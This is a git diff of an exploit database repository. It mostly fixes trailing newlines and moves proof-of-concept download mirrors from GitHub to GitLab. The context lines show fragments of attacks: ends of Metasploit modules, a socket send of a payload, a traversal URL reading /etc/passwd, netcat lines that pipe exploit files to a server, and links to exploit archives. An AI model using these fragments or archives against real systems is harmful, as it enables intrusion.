@@ class MetasploitModule < Msf::Exploit::Remote service.close_client(client) end -end +end \ No newline at end of file diff --git a/exploits/windows/remote/42703.rb b/exploits/windows/remote/42703.rb index 48e482bb0..f0e0b124c 100755 --- a/exploits/windows/remote/42703.rb +++ b/exploits/windows/remote/42703.rb @@ -109,4 +109,4 @@ class MetasploitModule < Msf::Exploit::Remote end end -__END__ +__END__ \ No newline at end of file diff --git a/exploits/windows/remote/42704.rb b/exploits/windows/remote/42704.rb index 27c28cf4d..62eff8479 100755 --- a/exploits/windows/remote/42704.rb +++ b/exploits/windows/remote/42704.rb @@ -124,4 +124,4 @@ class MetasploitModule < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/exploits/windows/remote/42711.txt b/exploits/windows/remote/42711.txt index 5412d2dfd..a850fdea2 100644 --- a/exploits/windows/remote/42711.txt +++ b/exploits/windows/remote/42711.txt @@ -14,4 +14,4 @@ If all is good mspaint should run. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42711.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42711.zip \ No newline at end of file diff --git a/exploits/windows/remote/42719.rb b/exploits/windows/remote/42719.rb index 18a506296..845539c26 100755 --- a/exploits/windows/remote/42719.rb +++ b/exploits/windows/remote/42719.rb @@ -121,4 +121,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/exploits/windows/remote/42720.rb b/exploits/windows/remote/42720.rb index 86d23d410..e319b9370 100755 --- a/exploits/windows/remote/42720.rb +++ b/exploits/windows/remote/42720.rb @@ -109,4 +109,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/exploits/windows/remote/42721.rb b/exploits/windows/remote/42721.rb index b44530b8e..f04a69bac 100755 --- a/exploits/windows/remote/42721.rb +++ b/exploits/windows/remote/42721.rb @@ -85,4 +85,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/exploits/windows/remote/42722.rb b/exploits/windows/remote/42722.rb index 94e1bf702..c2697b63a 100755 --- a/exploits/windows/remote/42722.rb +++ b/exploits/windows/remote/42722.rb @@ -102,4 +102,4 @@ __END__ 0033C081 5E POP ESI 0033C082 B8 01000000 MOV EAX,1 0033C087 5B POP EBX -0033C088 C3 RETN +0033C088 C3 RETN \ No newline at end of file diff --git a/exploits/windows/remote/42723.rb b/exploits/windows/remote/42723.rb index c8c8936cd..a90c4f2eb 100755 --- a/exploits/windows/remote/42723.rb +++ b/exploits/windows/remote/42723.rb @@ -71,4 +71,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/exploits/windows/remote/42724.rb b/exploits/windows/remote/42724.rb index 735e1b2ae..c6705b37b 100755 --- a/exploits/windows/remote/42724.rb +++ b/exploits/windows/remote/42724.rb @@ -75,4 +75,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/exploits/windows/remote/42725.rb b/exploits/windows/remote/42725.rb index 86c0038a7..766f32173 100755 --- a/exploits/windows/remote/42725.rb +++ b/exploits/windows/remote/42725.rb @@ -85,4 +85,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("#{peer} - Uploading .mof...") upload("#{levels}WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) end -end +end \ No newline at end of file diff --git a/exploits/windows/remote/42778.py b/exploits/windows/remote/42778.py index dbd323e29..b9cb6a5cb 100755 --- a/exploits/windows/remote/42778.py +++ b/exploits/windows/remote/42778.py @@ -86,4 +86,4 @@ if __name__ == "__main__": t = threading.Thread(target=send_egghunter_request) t.start() print "[+] Thread started." - send_exploit_request() + send_exploit_request() \ No newline at end of file diff --git a/exploits/windows/remote/42952.py b/exploits/windows/remote/42952.py index ef88b151b..a590d40e3 100755 --- a/exploits/windows/remote/42952.py +++ b/exploits/windows/remote/42952.py @@ -60,5 +60,4 @@ try: print "Serving at port: ", 3311 httpd.serve_forever() except: - print "Exiting..." - + print "Exiting..." \ No newline at end of file diff --git a/exploits/windows/remote/42973.py b/exploits/windows/remote/42973.py index 9e980751e..7c4e03ccb 100755 --- a/exploits/windows/remote/42973.py +++ b/exploits/windows/remote/42973.py @@ -100,4 +100,4 @@ print "Sending the payload!" expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) expl.connect(("10.10.10.10", 80)) expl.send(buf) -expl.close() +expl.close() \ No newline at end of file diff --git a/exploits/windows/remote/42984.rb b/exploits/windows/remote/42984.rb index 44701b265..7535cce62 100755 --- a/exploits/windows/remote/42984.rb +++ b/exploits/windows/remote/42984.rb @@ -92,4 +92,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end -end +end \ No newline at end of file diff --git a/exploits/windows/remote/43025.py b/exploits/windows/remote/43025.py index 180924f10..27ea6e769 100755 --- a/exploits/windows/remote/43025.py +++ b/exploits/windows/remote/43025.py @@ -64,6 +64,4 @@ while True: print conn.recv(1024) conn.send(buff + '\r\n') print conn.recv(1024) - conn.send('257' + '\r\n') - - + conn.send('257' + '\r\n') \ No newline at end of file diff --git a/exploits/windows/remote/43059.py b/exploits/windows/remote/43059.py index 35861f0f0..a0c32bc75 100755 --- a/exploits/windows/remote/43059.py +++ b/exploits/windows/remote/43059.py @@ -76,4 +76,4 @@ csock.send(buf) print binascii.hexlify(csock.recv(0x4000)) #necessary reads print binascii.hexlify(csock.recv(0x4000)) -csock.close() +csock.close() \ No newline at end of file diff --git a/exploits/windows/remote/43163.txt b/exploits/windows/remote/43163.txt index f24edcd67..ee6321082 100644 --- a/exploits/windows/remote/43163.txt +++ b/exploits/windows/remote/43163.txt @@ -29,4 +29,4 @@ example folder holds an .rtf file which exploits CVE-2017-11882 vulnerability an Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43163.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43163.zip \ No newline at end of file diff --git a/exploits/windows/remote/4334.txt b/exploits/windows/remote/4334.txt index a977c9079..9892fa2f1 100644 --- a/exploits/windows/remote/4334.txt +++ b/exploits/windows/remote/4334.txt @@ -7,6 +7,6 @@ thanks ole andre again, His ospy is perfect. 3. choose "send my webcam" to a contact id who is online using 7.x (8.0?). 4.when the otherside accept the invatation , the otherside's msn will be at least crashed, if you using aChinese version windows 2000 sp4 , maybe a reverse shell , if other verison windows 2000, you need adjust the jmpa address in the dll's sourcecode. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4334.rar (08292007-exp_msn.rar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4334.rar (08292007-exp_msn.rar) # milw0rm.com [2007-08-29] \ No newline at end of file diff --git a/exploits/windows/remote/44453.md b/exploits/windows/remote/44453.md index 847ce3fe7..4277a2a9c 100644 --- a/exploits/windows/remote/44453.md +++ b/exploits/windows/remote/44453.md @@ -22,7 +22,7 @@ $ cd ../../rdpy $ sudo python setup.py install ``` -EDB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44453.zip +EDB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44453.zip * It assumes a pretty clean inital state. Best to uninstall first relevant compontants such as cryptography,pyopenssl maybe (pip uninstall cryptography). * A different version of openssl needed to be installed for this to run successfully. The install script does that. diff --git a/exploits/windows/remote/44582.txt b/exploits/windows/remote/44582.txt index 572270393..7618b4c40 100644 --- a/exploits/windows/remote/44582.txt +++ b/exploits/windows/remote/44582.txt @@ -8,4 +8,4 @@ The code has been published as the vulnerability used has been patched on all co For more information, read the post at https://momo5502.com/blog/?p=34 -Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44582.zip \ No newline at end of file +Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44582.zip \ No newline at end of file diff --git a/exploits/windows/remote/44987.txt b/exploits/windows/remote/44987.txt index 8134d19a9..b51a80aac 100644 --- a/exploits/windows/remote/44987.txt +++ b/exploits/windows/remote/44987.txt @@ -13,4 +13,4 @@ overflow in Call of Duty: Modern Warfare (amongst other versions). 2. Proof of Concept -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44987.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44987.zip \ No newline at end of file diff --git a/exploits/windows/remote/45502.txt b/exploits/windows/remote/45502.txt index ae7796e35..34998ab10 100644 --- a/exploits/windows/remote/45502.txt +++ b/exploits/windows/remote/45502.txt @@ -19,4 +19,4 @@ To reproduce the PoC, you will need a remote machine hosting a samba server and Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45502.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45502.zip \ No newline at end of file diff --git a/exploits/windows/remote/46220.txt b/exploits/windows/remote/46220.txt index 328757dca..b8f6a9326 100644 --- a/exploits/windows/remote/46220.txt +++ b/exploits/windows/remote/46220.txt @@ -18,4 +18,4 @@ Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46220.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46220.zip \ No newline at end of file diff --git a/exploits/windows/remote/4664.txt b/exploits/windows/remote/4664.txt index 275792a6e..1c77161fb 100644 --- a/exploits/windows/remote/4664.txt +++ b/exploits/windows/remote/4664.txt @@ -37,6 +37,6 @@ Fuckz 2: - wslabi.com (too stupid resource for selling shit) - ICEPACK and MPACK coderz (Fucking javascript kidd0z and code thiefz) -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4664.tar.gz (11272007-qt_public.tar.gz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4664.tar.gz (11272007-qt_public.tar.gz) # milw0rm.com [2007-11-27] \ No newline at end of file diff --git a/exploits/windows/remote/4699.txt b/exploits/windows/remote/4699.txt index 5a64d926e..58f180e0e 100644 --- a/exploits/windows/remote/4699.txt +++ b/exploits/windows/remote/4699.txt @@ -112,7 +112,7 @@ disconnects from it. Example queries to send with netcat: http://aluigi.org/poc/fireflyz.zip - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4699.zip (2007-fireflyz.zip) + https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4699.zip (2007-fireflyz.zip) nc localhost 9999 -v -v < file.txt diff --git a/exploits/windows/remote/4715.txt b/exploits/windows/remote/4715.txt index 9d0d45155..b07a7d832 100644 --- a/exploits/windows/remote/4715.txt +++ b/exploits/windows/remote/4715.txt @@ -86,7 +86,7 @@ http://aluigi.org/poc/badbluebof.txt B] http://aluigi.org/testz/myhttpup.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4715.zip (2007-myhttpup.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4715.zip (2007-myhttpup.zip) myhttpup http://SERVER/upload.dll file.txt ../../file.txt filedata0 diff --git a/exploits/windows/remote/4760.txt b/exploits/windows/remote/4760.txt index 1f9459113..eb4e736a2 100644 --- a/exploits/windows/remote/4760.txt +++ b/exploits/windows/remote/4760.txt @@ -79,6 +79,6 @@ Microsoft Windows 2000 [Versión 5.00.2195] C:\WINNT\system32> Download: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4760.zip (2007-MessageQueue.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4760.zip (2007-MessageQueue.zip) # milw0rm.com [2007-12-21] \ No newline at end of file diff --git a/exploits/windows/remote/48537.py b/exploits/windows/remote/48537.py index f240bea81..731860a47 100755 --- a/exploits/windows/remote/48537.py +++ b/exploits/windows/remote/48537.py @@ -1,6 +1,6 @@ #!/usr/bin/env python ''' -# EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48537.zip +# EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48537.zip # SMBGhost_RCE_PoC diff --git a/exploits/windows/remote/4906.txt b/exploits/windows/remote/4906.txt index 36fe13def..43150b213 100644 --- a/exploits/windows/remote/4906.txt +++ b/exploits/windows/remote/4906.txt @@ -1,5 +1,5 @@ Quicktime Player 7.3.1.70 rtsp Remote Buffer Overflow Exploit PoC -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4906.zip (2008-quicktimebof.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4906.zip (2008-quicktimebof.zip) # milw0rm.com [2008-01-14] \ No newline at end of file diff --git a/exploits/windows/remote/4948.txt b/exploits/windows/remote/4948.txt index 68f2cd6c0..5bb5fbf05 100644 --- a/exploits/windows/remote/4948.txt +++ b/exploits/windows/remote/4948.txt @@ -1,5 +1,5 @@ Windows RSH daemon <= 1.8 Remote Buffer Overflow Exploit -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4948.tar.gz (2008-prdelka-vs-MS-rshd.tar.gz) +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4948.tar.gz (2008-prdelka-vs-MS-rshd.tar.gz) # milw0rm.com [2008-01-21] \ No newline at end of file diff --git a/exploits/windows/remote/4949.txt b/exploits/windows/remote/4949.txt index 3cb655b75..d816ed06a 100644 --- a/exploits/windows/remote/4949.txt +++ b/exploits/windows/remote/4949.txt @@ -1,5 +1,5 @@ Citadel SMTP <= 7.10 Remote Overflow Exploit -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/4949.tar.gz (2008-vs-GNU-citadel.tar.gz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4949.tar.gz (2008-vs-GNU-citadel.tar.gz) # milw0rm.com [2008-01-21] \ No newline at end of file diff --git a/exploits/windows/remote/5213.txt b/exploits/windows/remote/5213.txt index 92c0c6251..787457169 100644 --- a/exploits/windows/remote/5213.txt +++ b/exploits/windows/remote/5213.txt @@ -1,5 +1,5 @@ Versant server <= 7.0.1.3 Arbitrary Commands Execution Exploit -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5213.zip (2008-versantcmd.zip) +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5213.zip (2008-versantcmd.zip) # milw0rm.com [2008-03-04] \ No newline at end of file diff --git a/exploits/windows/remote/6004.txt b/exploits/windows/remote/6004.txt index b6ffd7b86..dc19b5b7b 100644 --- a/exploits/windows/remote/6004.txt +++ b/exploits/windows/remote/6004.txt @@ -13,6 +13,6 @@ Panda has patched newest version, so update will not connect to custom ( attacke Exploit: http://karol.wiesek.pl/files/panda.tgz -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6004.tgz (2008-panda.tgz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6004.tgz (2008-panda.tgz) # milw0rm.com [2008-07-04] \ No newline at end of file diff --git a/exploits/windows/remote/6367.txt b/exploits/windows/remote/6367.txt index c12836b5e..81dfab10e 100644 --- a/exploits/windows/remote/6367.txt +++ b/exploits/windows/remote/6367.txt @@ -22,6 +22,6 @@ and embedded systems… · Website : security.bkis.vn · Mail : svrt[at]bkav.com.vn -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6367.tgz (2008-chrome.tgz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6367.tgz (2008-chrome.tgz) # milw0rm.com [2008-09-05] \ No newline at end of file diff --git a/exploits/windows/remote/6656.txt b/exploits/windows/remote/6656.txt index a6f58d5ba..a3ca8690f 100644 --- a/exploits/windows/remote/6656.txt +++ b/exploits/windows/remote/6656.txt @@ -16,6 +16,6 @@ On Windows Xp Sp2 only causes Denial of service. -(Vulnerable function guarded with a GS cookie) -(The function which copies data to stack has an exception handler which recovers from access violations so u cant exploit it by hitting next page ). -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6656.tgz (2008-Gdi.tgz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6656.tgz (2008-Gdi.tgz) # milw0rm.com [2008-10-02] \ No newline at end of file diff --git a/exploits/windows/remote/6841.txt b/exploits/windows/remote/6841.txt index cb84c69c7..990ea6e19 100644 --- a/exploits/windows/remote/6841.txt +++ b/exploits/windows/remote/6841.txt @@ -1,6 +1,6 @@ MS08-067 Exploit for CN by EMM exploit: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/6841.rar (2008-MS08-067.rar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6841.rar (2008-MS08-067.rar) # milw0rm.com [2008-10-26] \ No newline at end of file diff --git a/exploits/windows/remote/7125.txt b/exploits/windows/remote/7125.txt index d90560f62..67a8c21e9 100644 --- a/exploits/windows/remote/7125.txt +++ b/exploits/windows/remote/7125.txt @@ -2,6 +2,6 @@ * (c) 2008 Andres Tarasco Acuña ( atarasco _at_ gmail.com ) * URL: http://tarasco.org/Web/tools.html -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/7125.zip (2008-smbrelay3.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/7125.zip (2008-smbrelay3.zip) # milw0rm.com [2008-11-14] \ No newline at end of file diff --git a/exploits/windows/remote/7403.txt b/exploits/windows/remote/7403.txt index b3b6b24ea..7d518ab7a 100644 --- a/exploits/windows/remote/7403.txt +++ b/exploits/windows/remote/7403.txt @@ -4,6 +4,6 @@ // http://www.metasploit.com // EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exe -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/7403.zip (2008-iesploit.tar.gz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/7403.zip (2008-iesploit.tar.gz) # milw0rm.com [2008-12-10] \ No newline at end of file diff --git a/exploits/windows/remote/8173.txt b/exploits/windows/remote/8173.txt index c0f533c47..891b62411 100644 --- a/exploits/windows/remote/8173.txt +++ b/exploits/windows/remote/8173.txt @@ -8,6 +8,6 @@ nc host port < belkin-buldog-exploit Thats all folks! -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8173.zip (2009-belkin-bulldog-exploit.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8173.zip (2009-belkin-bulldog-exploit.zip) # milw0rm.com [2009-03-09] \ No newline at end of file diff --git a/exploits/windows/remote/8704.txt b/exploits/windows/remote/8704.txt index 635e465e9..97ef8daa4 100644 --- a/exploits/windows/remote/8704.txt +++ b/exploits/windows/remote/8704.txt @@ -40,7 +40,7 @@ #### ###### ### ############### # ### -archive: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8704.pdf (2009-IIS-Advisory.pdf) +archive: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8704.pdf (2009-IIS-Advisory.pdf) *** FOR IMMEDIATE RELEASE *** *** FOR IMMEDIATE RELEASE *** diff --git a/exploits/windows/remote/8938.txt b/exploits/windows/remote/8938.txt index c4f8d35fa..2dcdb89f1 100644 --- a/exploits/windows/remote/8938.txt +++ b/exploits/windows/remote/8938.txt @@ -12,6 +12,6 @@ to bypass DEP and ASLR on Vista. The exploit page contains a .net control, so it should be published on IIS. ---seer[N.N.U] -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/8938.zip (2009-green-dam.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/8938.zip (2009-green-dam.zip) # milw0rm.com [2009-06-12] \ No newline at end of file diff --git a/exploits/windows/remote/986.html b/exploits/windows/remote/986.html index f97f5d4d2..19a1ab938 100644 --- a/exploits/windows/remote/986.html +++ b/exploits/windows/remote/986.html @@ -1,5 +1,5 @@ <!-- -1) wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/986.js (05072005.js) +1) wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/986.js (05072005.js) 2) change src= below 3) edit index and change tftp location @@ -11,7 +11,7 @@ <meta http-equiv="Expires" content="Tue, 16 Jan 1990 21:29:02 GMT"> - <script language="javascript" src="https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/986.js"></script></head> + <script language="javascript" src="https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/986.js"></script></head> <body> diff --git a/exploits/windows/remote/9905.cpp b/exploits/windows/remote/9905.cpp index 29a4c7051..e52b81a75 100644 --- a/exploits/windows/remote/9905.cpp +++ b/exploits/windows/remote/9905.cpp @@ -383,5 +383,4 @@ void main(int argc, char * argv[]) }; try_host (argv[1]); -}; - +}; \ No newline at end of file diff --git a/exploits/windows/webapps/11243.txt b/exploits/windows/webapps/11243.txt index 20a6ae157..141d4a650 100644 --- a/exploits/windows/webapps/11243.txt +++ b/exploits/windows/webapps/11243.txt @@ -21,4 +21,4 @@ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -[~]>> ...[END ADVISORY]... +[~]>> ...[END ADVISORY]... \ No newline at end of file diff --git a/exploits/windows/webapps/17388.txt b/exploits/windows/webapps/17388.txt index c6db50d15..af72668da 100644 --- a/exploits/windows/webapps/17388.txt +++ b/exploits/windows/webapps/17388.txt @@ -15,4 +15,4 @@ PoC Exploit: https://IP:8443/dsc//%c0%ae%c0%ae/%c0%ae%c0%ae/%c 0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%a e%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c 0%ae/%c0%ae%c0%ae/etc/passwd PDF Advisory: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17388.pdf \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17388.pdf \ No newline at end of file diff --git a/exploits/windows/webapps/18077.txt b/exploits/windows/webapps/18077.txt index 90b8d92cb..a3243f567 100644 --- a/exploits/windows/webapps/18077.txt +++ b/exploits/windows/webapps/18077.txt @@ -55,7 +55,7 @@ files in the partition where is installed the program. http://aluigi.org/poc/hpdpmedia_1.dat -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/18077.dat +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18077.dat nc SERVER 19813 < hpdpmedia_1.dat diff --git a/exploits/windows/webapps/19525.txt b/exploits/windows/webapps/19525.txt index 998eb3429..e8d6aebf2 100644 --- a/exploits/windows/webapps/19525.txt +++ b/exploits/windows/webapps/19525.txt @@ -1,4 +1,4 @@ -PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19525.zip +PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/19525.zip Paper: http://www.exploit-db.com/docs/19527.pdf diff --git a/exploits/windows/webapps/23132.py b/exploits/windows/webapps/23132.py index db3f67f33..1853dc39a 100755 --- a/exploits/windows/webapps/23132.py +++ b/exploits/windows/webapps/23132.py @@ -80,4 +80,4 @@ def MakePath(f, count): return a + f if __name__ == "__main__": - main() + main() \ No newline at end of file diff --git a/exploits/windows/webapps/31221.txt b/exploits/windows/webapps/31221.txt index ca3d3115c..100719e02 100644 --- a/exploits/windows/webapps/31221.txt +++ b/exploits/windows/webapps/31221.txt @@ -40,4 +40,4 @@ code and telephone number blank) 21. Login as user victim with the password you have chosen Proof of Concept Files: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31221.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31221.tar.gz \ No newline at end of file diff --git a/exploits/windows/webapps/39573.txt b/exploits/windows/webapps/39573.txt index 5e254dcb7..419c1174a 100644 --- a/exploits/windows/webapps/39573.txt +++ b/exploits/windows/webapps/39573.txt @@ -20,4 +20,4 @@ private boolean isForbiddenPath(String path) { which can be bypassed using lower case and adding meaningless character to path. Proof of Concept Video: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39573.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39573.zip \ No newline at end of file diff --git a/exploits/windows/webapps/42699.rb b/exploits/windows/webapps/42699.rb index 3876abfaa..6b1cd4cfa 100755 --- a/exploits/windows/webapps/42699.rb +++ b/exploits/windows/webapps/42699.rb @@ -56,4 +56,4 @@ class MetasploitModule < Msf::Auxiliary end end -end +end \ No newline at end of file diff --git a/exploits/windows/webapps/42705.rb b/exploits/windows/webapps/42705.rb index 117047e45..e17613ffd 100755 --- a/exploits/windows/webapps/42705.rb +++ b/exploits/windows/webapps/42705.rb @@ -64,4 +64,4 @@ class MetasploitModule < Msf::Auxiliary end end -end +end \ No newline at end of file diff --git a/exploits/windows/webapps/42706.rb b/exploits/windows/webapps/42706.rb index 63b4e925f..5e4111397 100755 --- a/exploits/windows/webapps/42706.rb +++ b/exploits/windows/webapps/42706.rb @@ -54,4 +54,4 @@ class MetasploitModule < Msf::Auxiliary end end -end +end \ No newline at end of file diff --git a/exploits/windows/webapps/42953.txt b/exploits/windows/webapps/42953.txt index 844e8c131..f21fa8ce4 100644 --- a/exploits/windows/webapps/42953.txt +++ b/exploits/windows/webapps/42953.txt @@ -19,4 +19,4 @@ This JSP could then be requested and any code it contained would be executed by <% out.println("hello");%> -It is the bypass for CVE-2017-12615 +It is the bypass for CVE-2017-12615 \ No newline at end of file diff --git a/exploits/windows/webapps/43018.html b/exploits/windows/webapps/43018.html index 99bfc08f1..1509e2787 100644 --- a/exploits/windows/webapps/43018.html +++ b/exploits/windows/webapps/43018.html @@ -80,4 +80,4 @@ Vulnerability Timeline: 18th August 2017 – Vulnerability Discovered 20th August 2017 – Contacted Vendor – No Response 1st September 2017 – Contacted Vendor again – No Response -18th September 2017 – Vulnerability Disclosed +18th September 2017 – Vulnerability Disclosed \ No newline at end of file diff --git a/exploits/windows/webapps/43019.txt b/exploits/windows/webapps/43019.txt index 19f4172c6..d945eb90c 100644 --- a/exploits/windows/webapps/43019.txt +++ b/exploits/windows/webapps/43019.txt @@ -50,4 +50,4 @@ Vulnerability Timeline: 18th August 2017 – Vulnerability Discovered 20th August 2017 – Contacted Vendor – No Response 1st September 2017 – Contacted Vendor again – No Response -18th September 2017 – Vulnerability Disclosed +18th September 2017 – Vulnerability Disclosed \ No newline at end of file diff --git a/exploits/windows/webapps/43129.txt b/exploits/windows/webapps/43129.txt index 4bb132994..c5cb20281 100644 --- a/exploits/windows/webapps/43129.txt +++ b/exploits/windows/webapps/43129.txt @@ -52,4 +52,4 @@ Content-Length: 101 Cookie: JSESSIONID_APM_9090=68C19C45D63C6FD102EB3DF25A8CE39D; testcookie=; am_username=; am_check=; am_mgview=availability Connection: close -method=getLatestStatusForJIT&haid=10000106&viewid=1¤time=1509869908111&resourceIDs=(0000106,0) +method=getLatestStatusForJIT&haid=10000106&viewid=1¤time=1509869908111&resourceIDs=(0000106,0) \ No newline at end of file diff --git a/exploits/windows/webapps/43883.txt b/exploits/windows/webapps/43883.txt index 4737e3235..08a966ecc 100644 --- a/exploits/windows/webapps/43883.txt +++ b/exploits/windows/webapps/43883.txt @@ -84,7 +84,7 @@ Upgrade to BMC Track-It! 11.5 or above. >> References: [1] https://raw.githubusercontent.com/pedrib/PoC/master/advisories/bmc-track-it-11.3.txt [2] https://communities.bmc.com/community/bmcdn/bmc_track-it/blog/2014/12/09/track-it-114-is-now-available -[3] https://github.com/pedrib/PoC/tree/master/exploits/TrackPwn (EDB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43883.zip) +[3] https://github.com/pedrib/PoC/tree/master/exploits/TrackPwn (EDB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43883.zip) ================ diff --git a/exploits/windows_x86-64/dos/39043.txt b/exploits/windows_x86-64/dos/39043.txt index e46b39827..8c740c971 100644 --- a/exploits/windows_x86-64/dos/39043.txt +++ b/exploits/windows_x86-64/dos/39043.txt @@ -21,4 +21,4 @@ A sample swf and fla are attached. Note that this PoC only works on 64-bit platf Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39043.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39043.zip \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/39072.txt b/exploits/windows_x86-64/dos/39072.txt index c91b648e0..100354fdd 100644 --- a/exploits/windows_x86-64/dos/39072.txt +++ b/exploits/windows_x86-64/dos/39072.txt @@ -18,4 +18,4 @@ A sample swf and fla are attached. Note that these PoCs will not cause a crash. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39072.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39072.zip \ No newline at end of file diff --git 